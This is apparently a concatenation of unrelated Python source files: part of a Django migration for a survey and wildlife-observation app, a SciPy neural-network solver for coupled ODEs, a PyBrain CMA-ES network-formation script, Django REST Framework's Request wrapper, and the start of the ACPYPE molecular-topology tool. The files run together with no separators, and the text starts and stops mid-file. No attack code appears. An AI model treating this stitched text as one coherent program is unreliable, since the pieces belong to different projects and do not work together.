serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=400)), ], ), migrations.CreateModel( name='Question', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('text', models.TextField()), ('required', models.BooleanField()), ('question_type', models.CharField(choices=[('text', 'text'), ('radio', 'radio'), ('select', 'select'), ('select-multiple', 'Select Multiple'), ('integer', 'integer')], default='text', max_length=200)), ('choices', models.TextField(blank=True, help_text='if the question type is "radio," "select," or "select multiple" provide a comma-separated list of options for this question .', null=True)), ('category', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='hnfp.Category')), ], ), migrations.CreateModel( name='Response', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('created', models.DateTimeField(auto_now_add=True)), ('updated', models.DateTimeField(auto_now=True)), ('interviewer', models.CharField(max_length=400, verbose_name='Name of Interviewer')), ('interviewee', models.CharField(max_length=400, verbose_name='Name of Interviewee')), ('conditions', models.TextField(blank=True, null=True, verbose_name='Conditions during interview')), ('comments', models.TextField(blank=True, null=True, verbose_name='Any additional Comments')), ('interview_uuid', models.CharField(max_length=36, verbose_name='Interview unique identifier')), ], ), migrations.CreateModel( name='Survey', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=400)), ('description', models.TextField()), ], ), migrations.CreateModel( name='AnswerInteger', fields=[ ('answerbase_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, 
primary_key=True, serialize=False, to='hnfp.AnswerBase')), ('body', models.IntegerField(blank=True, null=True)), ], bases=('hnfp.answerbase',), ), migrations.CreateModel( name='AnswerRadio', fields=[ ('answerbase_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='hnfp.AnswerBase')), ('body', models.TextField(blank=True, null=True)), ], bases=('hnfp.answerbase',), ), migrations.CreateModel( name='AnswerSelect', fields=[ ('answerbase_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='hnfp.AnswerBase')), ('body', models.TextField(blank=True, null=True)), ], bases=('hnfp.answerbase',), ), migrations.CreateModel( name='AnswerSelectMultiple', fields=[ ('answerbase_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='hnfp.AnswerBase')), ('body', models.TextField(blank=True, null=True)), ], bases=('hnfp.answerbase',), ), migrations.CreateModel( name='AnswerText', fields=[ ('answerbase_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='hnfp.AnswerBase')), ('body', models.TextField(blank=True, null=True)), ], bases=('hnfp.answerbase',), ), migrations.AddField( model_name='response', name='survey', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='hnfp.Survey'), ), migrations.AddField( model_name='question', name='survey', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='hnfp.Survey'), ), migrations.AddField( model_name='category', name='survey', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='hnfp.Survey'), ), migrations.AddField( model_name='answerbase', name='question', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='hnfp.Question'), ), migrations.AddField( model_name='answerbase', name='response', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='hnfp.Response'), ), migrations.CreateModel( name='Post', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=250)), ('slug', models.SlugField(max_length=250, unique_for_date='publish')), ('body', models.TextField()), ('allow_comments', models.BooleanField(default=True, verbose_name='allow comments')), ('publish', models.DateTimeField(default=django.utils.timezone.now)), ], options={ 'ordering': ('-publish',), }, ), migrations.CreateModel( name='JobOpportunity', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=400)), ('posted', models.DateTimeField(auto_now_add=True)), ('description', ckeditor.fields.RichTextField(blank=True, null=True)), ('jop_post_doc', models.FileField(blank=True, upload_to='job-post/')), ('html_content', models.TextField(blank=True, help_text='html if use html == True', null=True)), ('is_html', models.BooleanField(default=False, help_text='Use HTML editor')), ], options={ 'verbose_name_plural': 'Job Opportunities', }, ), migrations.CreateModel( name='Observation', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('customcategory', models.CharField(blank=True, max_length=400, null=True)), 
('observation_date', models.CharField(blank=True, max_length=100, null=True)), ('observation_type', models.CharField(blank=True, max_length=400, null=True)), ('observation_tally', models.CharField(blank=True, default=1, max_length=100, null=True)), ('observation_created', models.DateTimeField(auto_now_add=True)), ('observation_updated', models.DateTimeField(auto_now=True)), ('number_of_observers', models.CharField(blank=True, default=1, max_length=100, null=True)), ('comments', models.CharField(blank=True, default=None, max_length=20000, null=True)), ('category', models.CharField(choices=[('bear', 'Bear'), ('deer', 'Dear'), ('medicinal_herbs', 'Medicinal Herbs'), ('shrimp', 'Shrimp'), ('berries', 'Berries'), ('firewood', 'Firewood'), ('mushrooms', 'Mushrooms'), ('crab', 'Crab'), ('fish', 'Fish'), ('shellfish', 'Shellfish'), ('custom', 'Custom')], default='custom', max_length=400)), ('observation_time', models.CharField(blank=True, max_length=20, null=True)), ('observation_location', django.contrib.gis.db.models.fields.PointField(blank=True, default=None, null=True, srid=3857)), ], options={ 'verbose_name_plural': 'Observations', }, ), migrations.CreateModel( name='AOI', fields=[ ('aoi_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='drawing.AOI')), ], options={ 'abstract': False, }, bases=('drawing.aoi',), ), ]
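# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the generated migration): once this squashed
# migration is applied, the Observation model it creates can be used through
# the regular GeoDjango ORM.  The import path 'hnfp.models' below is assumed
# from the app label; adjust it to the actual project layout.
#
#     from django.contrib.gis.geos import Point
#     from hnfp.models import Observation
#
#     obs = Observation.objects.create(
#         category='fish',
#         observation_tally='3',
#         observation_location=Point(-14980000, 7160000, srid=3857),
#     )
#     Observation.objects.filter(category='fish').count()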
from __future__ import print_function
from scipy.special import expit
import scipy.optimize
from scipy.optimize import minimize #, differential_evolution
import numpy as np
from math import sin,cos

#xarr=var('xarr')
# Collocation grid and problem/network sizes
x=np.linspace(0,2,11)
#x=np.array([1.0])
hvar=5      # number of hidden units per trial solution
numeqs=4    # number of coupled ODEs
omega=1.0
theta=1.0

# Bounds are only used by the (commented-out) differential_evolution run
bounds=np.zeros([3*4*5,2])
for i in range(3*4*5):
    bounds[i,0]=-5
    bounds[i,1]=5

partot=np.array(np.zeros(3*hvar*numeqs))  # all network parameters, flattened
x0=[1.0,0.0,0.0,0.0]                      # initial conditions of the four ODEs
#par = par.reshape(3,hvar)
print(partot)
print(x)
one=np.ones(hvar)

def sig(x,par):
    """Sigmoid activations of the hidden layer for every collocation point."""
    ans=[]
    par1 = par.reshape(3,hvar)
    #print("test", par[2])
    for i in x:
        ans.append(expit(i*par1[1,:]+par1[2,:]))
        #ans.append(np.tanh(i*par1[1,:]+par1[2,:]))
    return ans

def N(x,par):
    """Network output: output weights dotted with the hidden activations."""
    par1=par.reshape(3,hvar)
    ans=np.inner(par1[0,:],sig(x,par))
    return ans

def y(x,par,xini):
    """Trial solution y(x) = y(0) + x*N(x), which satisfies the initial condition."""
    return xini+x*N(x,par)

def dNdx(x,par):
    """Analytic derivative of the network output with respect to x."""
    par1=par.reshape(3,hvar)
    ans=np.zeros(len(x))
    #print(len(x))
    for j in range(len(x)):
        for i in range(hvar):
            ans[j]=ans[j]+(par1[0,i])*(sig(x,par)[j][i])*((one-sig(x,par))[j][i])*par1[1,i]
    return ans

def dydx(x,par):
    return N(x,par)+x*dNdx(x,par)

def yp(partot):
    """Cost: squared residuals of the four coupled ODEs on the collocation grid."""
    partot1=partot.reshape((numeqs,3,hvar))
    cost=0.0
    cost=cost+np.sum(0.5*(dydx(x,partot1[0,:,:])-2*omega*sin(2*theta)*y(x,partot1[3,:,:],x0[3]))**2)
    cost=cost+np.sum(0.5*(dydx(x,partot1[1,:,:])+2*omega*sin(2*theta)*y(x,partot1[3,:,:],x0[3]))**2)
    cost=cost+np.sum(0.5*(dydx(x,partot1[2,:,:])-2*omega*cos(2*theta)*y(x,partot1[3,:,:],x0[3]))**2)
    cost=cost+np.sum(0.5*(dydx(x,partot1[3,:,:])+2*omega*cos(2*theta)*y(x,partot1[2,:,:],x0[2])+omega*sin(2*theta)*y(x,partot1[0,:,:],x0[0])-omega*sin(2*theta)*y(x,partot1[1,:,:],x0[1]))**2)
    cost = cost#+np.sum((y(x,partot1[0,:,:],x0[0])+y(x,partot1[1,:,:],x0[1])-1.0)**2)
    return cost

#def ypprime(par):

#vout=minimize(yp,par,method='COBYLA',options={"maxfev": 10000})
#vout=minimize(yp,partot,method='SLSQP',options={"maxiter": 1000})
# Nelder-Mead ignores `bounds`; 'fatol' is the function tolerance (the older
# 'ftol' spelling is silently ignored by current SciPy).
vout=minimize(yp,partot,method='Nelder-Mead',tol=1e-5,options={"fatol":1e-3, "maxfev": 1000000,"maxiter":1000000})
#vout=differential_evolution(yp,bounds,strategy='best1bin',tol=0.1,maxiter=1,polish=True)
print(vout)
# Save only the optimized parameter vector; the OptimizeResult object itself
# is not array-like, so passing it to savetxt would fail.
np.savetxt('vout-output.txt', vout.x, delimiter=',')
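# ---------------------------------------------------------------------------
# Hedged follow-up sketch: assuming the optimizer converged, `vout.x` holds the
# trained weights in the same (numeqs, 3, hvar) layout as `partot`, so the four
# trial solutions can be evaluated on the collocation grid like this.
pfit = vout.x.reshape((numeqs, 3, hvar))
for k in range(numeqs):
    print("y_%d(x) = %s" % (k, y(x, pfit[k], x0[k])))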
# This file, apart from implementing a network formation model, also demonstrates the use of a Black Box optimization technique
# implemented via Pybrain (pybrain.org)
# Note that module.py needs to be importable in order to run this
from __future__ import division
from __future__ import print_function
import module
import math
import networkx as nx
from numpy import mean
from numpy import std
from pybrain.optimization import CMAES
import time

start_time = time.time()
zac = nx.karate_club_graph()
#print(module.rec_number(zac,0), module.rec_number(zac,1), module.rec_number(zac,2))
er = nx.florentine_families_graph()
countess = 0

def graph_function(p):
    """Objective: squared error between the mean simulated recurring-subgraph
    counts (from module.rec_number) and the target counts in tri_count."""
    # CMAES explores unconstrained parameters, so fold negative values back
    # and normalize the first three entries into probabilities.
    if(p[0]<0):
        p[0] = p[0]*(-1)
    if(p[1]<0):
        p[1] = p[1]*(-1)
    if(p[2]<0):
        p[2] = p[2]*(-1)
    q = p[0] + p[1] + p[2]
    p[3] = p[4] = p[5] = p[6] = 0
    p[0] = p[0]/q
    p[1] = p[1]/q
    p[2] = p[2]/q
    nodes = 20
    edges = 50
    simulations = 10
    # tri_count = [module.rec_number(er,0), module.rec_number(er,1), module.rec_number(er,2)]
    tri_count = [5.6,8.36,13.96]
    tri_0 = []
    tri_1 = []
    tri_2 = []
    count = 0
    while(count<simulations):
        # Grow a random graph edge by edge according to the model parameters p
        main = nx.Graph()
        for i in range(1,nodes+1):
            main.add_node(i)
        while(len(main.edges())<edges):
            string, n = module.place_edge(main, p)
            if(string == 'stop'):
                break
        tri_0.append(module.rec_number(main,0))
        tri_1.append(module.rec_number(main,1))
        tri_2.append(module.rec_number(main,2))
        count = count + 1
        print(count)
    return pow((mean(tri_0) - tri_count[0]),2) + pow((mean(tri_1) - tri_count[1]),2) + pow((mean(tri_2) - tri_count[2]),2)

def objF(p): return graph_function(p)

p0 = [0.333,0.3333,0.3333,0,0,0,0]
#p0 = [1/7,1/7,1/7,1/7,1/7,1/7,1/7]
l = CMAES(objF, p0)
l.verbose = True
l.minimize = True
l._notify()
l.desiredEvaluation = 3
g = l.learn()
# learn() returns (best parameters, best fitness); normalize the parameters
# the same way graph_function does before reporting them.
if(g[0][0]<0):
    g[0][0] = g[0][0]*(-1)
if(g[0][1]<0):
    g[0][1] = g[0][1]*(-1)
if(g[0][2]<0):
    g[0][2] = g[0][2]*(-1)
summ = g[0][0] + g[0][1] + g[0][2]
print(g[0][0]/summ, g[0][1]/summ, g[0][2]/summ)
print(g[1])
end_time = time.time()
print("The optimization took", end_time - start_time, "seconds")
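# ---------------------------------------------------------------------------
# Hedged follow-up sketch: to check the fit, the objective can be re-evaluated
# at the learned, normalized parameters.  `graph_function` mutates and
# re-normalizes its argument in place, so pass it a fresh list.
#
#     p_best = [g[0][0] / summ, g[0][1] / summ, g[0][2] / summ, 0, 0, 0, 0]
#     print("residual at optimum:", graph_function(p_best))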
""" The Request class is used as a wrapper around the standard request object. The wrapped request then offers a richer API, in particular : - content automatically parsed according to `Content-Type` header, and available as `request.data` - full support of PUT method, including support for file uploads - form overloading of HTTP method, content type and content """ import io import sys from contextlib import contextmanager from django.conf import settings from django.http import HttpRequest, QueryDict from django.http.multipartparser import parse_header from django.http.request import RawPostDataException from django.utils.datastructures import MultiValueDict from rest_framework import HTTP_HEADER_ENCODING, exceptions from rest_framework.settings import api_settings def is_form_media_type(media_type): """ Return True if the media type is a valid form media type. """ base_media_type, params = parse_header(media_type.encode(HTTP_HEADER_ENCODING)) return (base_media_type == 'application/x-www-form-urlencoded' or base_media_type == 'multipart/form-data') class override_method: """ A context manager that temporarily overrides the method on a request, additionally setting the `view.request` attribute. Usage: with override_method(view, request, 'POST') as request: ... # Do stuff with `view` and `request` """ def __init__(self, view, request, method): self.view = view self.request = request self.method = method self.action = getattr(view, 'action', None) def __enter__(self): self.view.request = clone_request(self.request, self.method) # For viewsets we also set the `.action` attribute. action_map = getattr(self.view, 'action_map', {}) self.view.action = action_map.get(self.method.lower()) return self.view.request def __exit__(self, *args, **kwarg): self.view.request = self.request self.view.action = self.action class WrappedAttributeError(Exception): pass @contextmanager def wrap_attributeerrors(): """ Used to re-raise AttributeErrors caught during authentication, preventing these errors from otherwise being handled by the attribute access protocol. """ try: yield except AttributeError: info = sys.exc_info() exc = WrappedAttributeError(str(info[1])) raise exc.with_traceback(info[2]) class Empty: """ Placeholder for unset attributes. Cannot use `None`, as that may be a valid value. """ pass def _hasattr(obj, name): return not getattr(obj, name) is Empty def clone_request(request, method): """ Internal helper method to clone a request, replacing with a different HTTP method. Used for checking permissions against other methods. 
""" ret = Request(request=request._request, parsers=request.parsers, authenticators=request.authenticators, negotiator=request.negotiator, parser_context=request.parser_context) ret._data = request._data ret._files = request._files ret._full_data = request._full_data ret._content_type = request._content_type ret._stream = request._stream ret.method = method if hasattr(request, '_user'): ret._user = request._user if hasattr(request, '_auth'): ret._auth = request._auth if hasattr(request, '_authenticator'): ret._authenticator = request._authenticator if hasattr(request, 'accepted_renderer'): ret.accepted_renderer = request.accepted_renderer if hasattr(request, 'accepted_media_type'): ret.accepted_media_type = request.accepted_media_type if hasattr(request, 'version'): ret.version = request.version if hasattr(request, 'versioning_scheme'): ret.versioning_scheme = request.versioning_scheme return ret class ForcedAuthentication: """ This authentication class is used if the test client or request factory forcibly authenticated the request. """ def __init__(self, force_user, force_token): self.force_user = force_user self.force_token = force_token def authenticate(self, request): return (self.force_user, self.force_token) class Request: """ Wrapper allowing to enhance a standard `HttpRequest` instance. Kwargs: - request(HttpRequest). The original request instance. - parsers(list/tuple). The parsers to use for parsing the request content. - authenticators(list/tuple). The authenticators used to try authenticating the request's user. """ def __init__(self, request, parsers=None, authenticators=None, negotiator=None, parser_context=None): assert isinstance(request, HttpRequest), ( 'The `request` argument must be an instance of ' '`django.http.HttpRequest`, not `{}.{}`.' .format(request.__class__.__module__, request.__class__.__name__) ) self._request = request self.parsers = parsers or () self.authenticators = authenticators or () self.negotiator = negotiator or self._default_negotiator() self.parser_context = parser_context self._data = Empty self._files = Empty self._full_data = Empty self._content_type = Empty self._stream = Empty if self.parser_context is None: self.parser_context = {} self.parser_context['request'] = self self.parser_context['encoding'] = request.encoding or settings.DEFAULT_CHARSET force_user = getattr(request, '_force_auth_user', None) force_token = getattr(request, '_force_auth_token', None) if force_user is not None or force_token is not None: forced_auth = ForcedAuthentication(force_user, force_token) self.authenticators = (forced_auth,) def __repr__(self): return '<%s.%s: %s %r>' % ( self.__class__.__module__, self.__class__.__name__, self.method, self.get_full_path()) def _default_negotiator(self): return api_settings.DEFAULT_CONTENT_NEGOTIATION_CLASS() @property def content_type(self): meta = self._request.META return meta.get('CONTENT_TYPE', meta.get('HTTP_CONTENT_TYPE', '')) @property def stream(self): """ Returns an object that may be used to stream the request content. """ if not _hasattr(self, '_stream'): self._load_stream() return self._stream @property def query_params(self): """ More semantically correct name for request.GET. """ return self._request.GET @property def data(self): if not _hasattr(self, '_full_data'): self._load_data_and_files() return self._full_data @property def user(self): """ Returns the user associated with the current request, as authenticated by the authentication classes provided to the request. 
""" if not hasattr(self, '_user'): with wrap_attributeerrors(): self._authenticate() return self._user @user.setter def user(self, value): """ Sets the user on the current request. This is necessary to maintain compatibility with django.contrib.auth where the user property is set in the login and logout functions. Note that we also set the user on Django's underlying `HttpRequest` instance, ensuring that it is available to any middleware in the stack. """ self._user = value self._request.user = value @property def auth(self): """ Returns any non-user authentication information associated with the request, such as an authentication token. """ if not hasattr(self, '_auth'): with wrap_attributeerrors(): self._authenticate() return self._auth @auth.setter def auth(self, value): """ Sets any non-user authentication information associated with the request, such as an authentication token. """ self._auth = value self._request.auth = value @property def successful_authenticator(self): """ Return the instance of the authentication instance class that was used to authenticate the request, or `None`. """ if not hasattr(self, '_authenticator'): with wrap_attributeerrors(): self._authenticate() return self._authenticator def _load_data_and_files(self): """ Parses the request content into `self.data`. """ if not _hasattr(self, '_data'): self._data, self._files = self._parse() if self._files: self._full_data = self._data.copy() self._full_data.update(self._files) else: self._full_data = self._data # if a form media type, copy data & files refs to the underlying # http request so that closable objects are handled appropriately. if is_form_media_type(self.content_type): self._request._post = self.POST self._request._files = self.FILES def _load_stream(self): """ Return the content body of the request, as a stream. """ meta = self._request.META try: content_length = int( meta.get('CONTENT_LENGTH', meta.get('HTTP_CONTENT_LENGTH', 0)) ) except (ValueError, TypeError): content_length = 0 if content_length == 0: self._stream = None elif not self._request._read_started: self._stream = self._request else: self._stream = io.BytesIO(self.body) def _supports_form_parsing(self): """ Return True if this requests supports parsing form data. """ form_media = ( 'application/x-www-form-urlencoded', 'multipart/form-data' ) return any([parser.media_type in form_media for parser in self.parsers]) def _parse(self): """ Parse the request content, returning a two-tuple of (data, files) May raise an `UnsupportedMediaType`, or `ParseError` exception. """ media_type = self.content_type try: stream = self.stream except RawPostDataException: if not hasattr(self._request, '_post'): raise # If request.POST has been accessed in middleware, and a method='POST' # request was made with 'multipart/form-data', then the request stream # will already have been exhausted. if self._supports_form_parsing(): return (self._request.POST, self._request.FILES) stream = None if stream is None or media_type is None: if media_type and is_form_media_type(media_type): empty_data = QueryDict('', encoding=self._request._encoding) else: empty_data = {} empty_files = MultiValueDict() return (empty_data, empty_files) parser = self.negotiator.select_parser(self, self.parsers) if not parser: raise exceptions.UnsupportedMediaType(media_type) try: parsed = parser.parse(stream, media_type, self.parser_context) except Exception: # If we get an exception during parsing, fill in empty data and # re-raise. 
Ensures we don't simply repeat the error when # attempting to render the browsable renderer response, or when # logging the request or similar. self._data = QueryDict('', encoding=self._request._encoding) self._files = MultiValueDict() self._full_data = self._data raise # Parser classes may return the raw data, or a # DataAndFiles object. Unpack the result as required. try: return (parsed.data, parsed.files) except AttributeError: empty_files = MultiValueDict() return (parsed, empty_files) def _authenticate(self): """ Attempt to authenticate the request using each authentication instance in turn. """ for authenticator in self.authenticators: try: user_auth_tuple = authenticator.authenticate(self) except exceptions.APIException: self._not_authenticated() raise if user_auth_tuple is not None: self._authenticator = authenticator self.user, self.auth = user_auth_tuple return self._not_authenticated() def _not_authenticated(self): """ Set authenticator, user & authtoken representing an unauthenticated request. Defaults are None, AnonymousUser & None. """ self._authenticator = None if api_settings.UNAUTHENTICATED_USER: self.user = api_settings.UNAUTHENTICATED_USER() else: self.user = None if api_settings.UNAUTHENTICATED_TOKEN: self.auth = api_settings.UNAUTHENTICATED_TOKEN() else: self.auth = None def __getattr__(self, attr): """ If an attribute does not exist on this instance, then we also attempt to proxy it to the underlying HttpRequest object. """ try: return getattr(self._request, attr) except AttributeError: return self.__getattribute__(attr) @property def DATA(self): raise NotImplementedError( '`request.DATA` has been deprecated in favor of `request.data` ' 'since version 3.0, and has been fully removed as of version 3.2.' ) @property def POST(self): # Ensure that request.POST uses our request parsing. if not _hasattr(self, '_data'): self._load_data_and_files() if is_form_media_type(self.content_type): return self._data return QueryDict('', encoding=self._request._encoding) @property def FILES(self): # Leave this one alone for backwards compat with Django's request.FILES # Different from the other two cases, which are not valid property # names on the WSGIRequest class. if not _hasattr(self, '_files'): self._load_data_and_files() return self._files @property def QUERY_PARAMS(self): raise NotImplementedError( '`request.QUERY_PARAMS` has been deprecated in favor of `request.query_params` ' 'since version 3.0, and has been fully removed as of version 3.2.' ) def force_plaintext_errors(self, value): # Hack to allow our exception handler to force choice of # plaintext or html error responses. self._request.is_ajax = lambda: value
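# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of this module): how the wrapper is typically
# constructed in tests.  APIRequestFactory and JSONParser are the standard
# rest_framework helpers; the URL and payload below are arbitrary examples.
#
#     from rest_framework.parsers import JSONParser
#     from rest_framework.test import APIRequestFactory
#
#     factory = APIRequestFactory()
#     django_request = factory.post('/example/', {'k': 'v'}, format='json')
#     request = Request(django_request, parsers=[JSONParser()])
#     request.data          # content parsed per Content-Type -> {'k': 'v'}
#     request.query_params  # same as django_request.GET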
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Requirements: Python 3.6 or higher Antechamber (from AmberTools preferably) OpenBabel (optional, but strongly recommended) This code is released under GNU General Public License V3. <<< NO WARRANTY AT ALL!!! >>> It was inspired by: - amb2gmx.pl (Eric Sorin, David Mobley and John Chodera) and depends on Antechamber and Openbabel - YASARA Autosmiles: http://www.yasara.org/autosmiles.htm (Elmar Krieger) - topolbuild (Bruce Ray) - xplo2d (G.J. Kleywegt) For Non-uniform 1-4 scale factor conversion (e.g. if using GLYCAM06), please cite: BERNARDI, A., FALLER, R., REITH, D., and KIRSCHNER, K. N. ACPYPE update for nonuniform 1-4 scale factors: Conversion of the GLYCAM06 force field from AMBER to GROMACS. SoftwareX 10 (2019), 100241. doi: 10.1016/j.softx.2019.100241 For Antechamber, please cite: 1. WANG, J., WANG, W., KOLLMAN, P. A., and CASE, D. A. Automatic atom type and bond type perception in molecular mechanical calculations. Journal of Molecular Graphics and Modelling 25, 2 (2006), 247-260. doi: 10.1016/j.jmgm.2005.12.005 2. WANG, J., WOLF, R. M., CALDWELL, J. W., KOLLMAN, P. A., and CASE, D. A. Development and testing of a General Amber Force Field. Journal of Computational Chemistry 25, 9 (2004), 1157-1174. doi: 10.1002/jcc.20035 If you use this code, I am glad if you cite: SOUSA DA SILVA, A. W. & VRANKEN, W. F. ACPYPE - AnteChamber PYthon Parser interfacE. BMC Research Notes 5 (2012), 367 doi: 10.1186/1756-0500-5-367 http://www.biomedcentral.com/1756-0500/5/367 BATISTA, P. R.; WILTER, A.; DURHAM, E. H. A. B. & PASCUTTI, P. G. Molecular Dynamics Simulations Applied to the Study of Subtypes of HIV-1 Protease. Cell Biochemistry and Biophysics 44 (2006), 395-404. doi: 10.1385/CBB:44:3:395 Alan Wilter Sousa da Silva, D.Sc. Bioinformatician, UniProt, EMBL-EBI Hinxton, Cambridge CB10 1SD, UK. >>http://www.ebi.ac.uk/~awilter<< alanwilter _at_ gmail _dot_ com """ import traceback import signal import time import argparse import math import os import pickle import sys import subprocess as sub import re import abc import array # to pacify PyLint from datetime import datetime from shutil import copy2, rmtree, which import sysconfig MAXTIME = 3 * 3600 # For pip package if which("antechamber") is None: LOCAL_PATH = sysconfig.get_paths()["purelib"] if sys.platform == "linux": os.environ["PATH"] += ( os.pathsep + LOCAL_PATH + "amber19-0_linux/bin/to_be_dispatched:" + LOCAL_PATH + "/amber19-0_linux/bin:" + LOCAL_PATH + "/amber19-0_linux/dat/" ) os.environ["AMBERHOME"] = LOCAL_PATH + "/amber19-0_linux/" os.environ["ACHOME"] = LOCAL_PATH + "/amber19-0_linux/bin/" os.environ["LD_LIBRARY_PATH"] = LOCAL_PATH + "/amber19-0_linux/lib/" elif sys.platform == "darwin": os.environ["PATH"] += ( os.pathsep + LOCAL_PATH + "amber19-0_os/bin/to_be_dispatched:" + LOCAL_PATH + "/amber19-0_os/bin:" + LOCAL_PATH + "/amber19-0_os/dat/" ) os.environ["AMBERHOME"] = LOCAL_PATH + "/amber19-0_os/" os.environ["ACHOME"] = LOCAL_PATH + "/amber19-0_os/bin/" os.environ["LD_LIBRARY_PATH"] = LOCAL_PATH + "/amber19-0_os/lib/" if sys.version_info < (3, 6): print("ERROR: Sorry, you need python 3.6 or higher") sys.exit(5) year = datetime.today().year __updated__ = "2021-02-05T22:15:50CET" # tag = "2019-09-26T19:44:00UTC" tag = __updated__ lineHeader = """ | ACPYPE: AnteChamber PYthon Parser interfacE v. 
%s (c) %s AWSdS | """ % ( tag, year, ) frameLine = (len(lineHeader) - 2) * "=" header = "%s%s%s" % (frameLine, lineHeader, frameLine) # TODO: # Howto Charmm and Amber with NAMD # Howto build topology for a modified amino acid # CYANA topology files # List of Topology Formats created by acpype so far: outTopols = ["gmx", "cns", "charmm"] qDict = {"mopac": 0, "divcon": 1, "sqm": 2} # Residues that are not solute, to be avoided when balancing charges in # amb2gmx mode ionOrSolResNameList = ["Cl-", "Na+", "K+", "CIO", "Cs+", "IB", "Li+", "MG2", "Rb+", "WAT", "MOH", "NMA"] # leapAmberFile = 'leaprc.ff99SB' # 'leaprc.ff10' and 'leaprc.ff99bsc0' has extra Atom Types not in parm99.dat leapAmberFile = "leaprc.protein.ff14SB" # 'leaprc.ff14SB' # "qm_theory='AM1', grms_tol=0.0002, maxcyc=999, tight_p_conv=1, scfconv=1.d-10," # "AM1 ANALYT MMOK GEO-OK PRECISE" cal = 4.184 Pi = 3.141593 qConv = 18.2223 radPi = 57.295780 # 180/Pi maxDist = 3.0 minDist = 0.5 maxDist2 = maxDist ** 2 # squared Ang. minDist2 = minDist ** 2 # squared Ang. diffTol = 0.01 dictAmbAtomType2AmbGmxCode = { "BR": "1", "C": "2", "CA": "3", "CB": "4", "CC": "5", "CK": "6", "CM": "7", "CN": "8", "CQ": "9", "CR": "10", "CT": "11", "CV": "12", "CW": "13", "C*": "14", "Ca": "15", "F": "16", "H": "17", "HC": "18", "H1": "19", "H2": "20", "H3": "21", "HA": "22", "H4": "23", "H5": "24", "HO": "25", "HS": "26", "HW": "27", "HP": "28", "I": "29", "Cl": "30", "Na": "31", "IB": "32", "Mg": "33", "N": "34", "NA": "35", "NB": "36", "NC": "37", "N2": "38", "N3": "39", "N*": "40", "O": "41", "OW": "42", "OH": "43", "OS": "44", "O2": "45", "P": "46", "S": "47", "SH": "48", "CU": "49", "FE": "50", "K": "51", "Rb": "52", "Cs": "53", "Li": "56", "Zn": "57", "Sr": "58", "Ba": "59", "MCH3A": "MCH3A", "MCH3B": "MCH3B", "MNH2": "MNH2", "MNH3": "MNH3", "MW": "MW", } dictOplsAtomType2OplsGmxCode = { "Ac3+": ["697"], "Am3+": ["699"], "Ar": ["Ar", "097"], "Ba2+": ["414"], "Br": ["722", "730"], "Br-": ["402"], "CT": [ "064", "076", "122", "135", "136", "137", "138", "139", "148", "149", "152", "157", "158", "159", "161", "173", "174", "175", "181", "182", "183", "184", "206", "207", "208", "209", "210", "211", "212", "213", "214", "215", "216", "217", "218", "219", "220", "223", "224", "225", "229", "230", "242", "243", "244", "256", "257", "258", "259", "273", "274", "275", "276", "291", "292", "293", "294", "297", "305", "306", "307", "308", "331", "371", "373", "375", "391", "396", "421", "431", "443", "448", "453", "455", "458", "461", "468", "476", "482", "484", "486", "490", "491", "492", "498", "499", "505", "515", "516", "645", "670", "671", "672", "673", "674", "675", "676", "677", "678", "679", "680", "681", "701", "725", "747", "748", "755", "756", "757", "758", "762", "764", "765", "766", "774", "775", "776", "782", "783", "903", "904", "905", "906", "907", "908", "912", "913", "914", "915", "942", "943", "944", "945", "951", "957", "959", "960", "961", "962", "963", "964", ], "CA": [ "053", "145", "147", "166", "199", "221", "228", "260", "263", "266", "302", "312", "315", "317", "336", "351", "362", "380", "457", "460", "463", "472", "488", "521", "522", "523", "528", "532", "533", "538", "539", "551", "582", "590", "591", "592", "593", "604", "605", "606", "607", "608", "609", "610", "611", "612", "625", "644", "647", "648", "649", "650", "651", "652", "714", "716", "718", "720", "724", "727", "729", "731", "735", "736", "737", "738", "739", "742", "752", "768", "916", "917", "918", ], "C3": [ "007", "010", "036", "039", "063", "065", "067", 
